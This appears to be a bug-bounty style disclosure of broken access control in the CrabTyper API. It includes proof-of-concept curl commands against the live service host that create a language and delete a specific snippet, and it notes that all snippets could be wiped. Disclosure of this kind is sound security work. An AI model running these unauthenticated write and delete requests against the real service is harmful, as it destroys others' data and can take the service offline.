# Description
The API program allows any user to create languages and snippets, as well as delete them. This allows a malicious actor to add offensive snippets which could appear to any user, and also allows anyone to completely take down the service by removing all snippets.
This is due to insufficient access control being implemented in the API.
# Proof of Concept
Create a language:
“`
$ curl -X POST -H “Content-Type: application/json” https://crabtyper-api.azurewebsites.net/api/languages -d “{“name”:”example”}”
“`
Delete a snippet:
“`
$ curl -X DELETE https://crabtyper-api.azurewebsites.net/api/snippets/4a917fe1-ed65-4134-b8de-423023970ac9
“`
These are just two examples, snippets can also be created in a similar way.Read More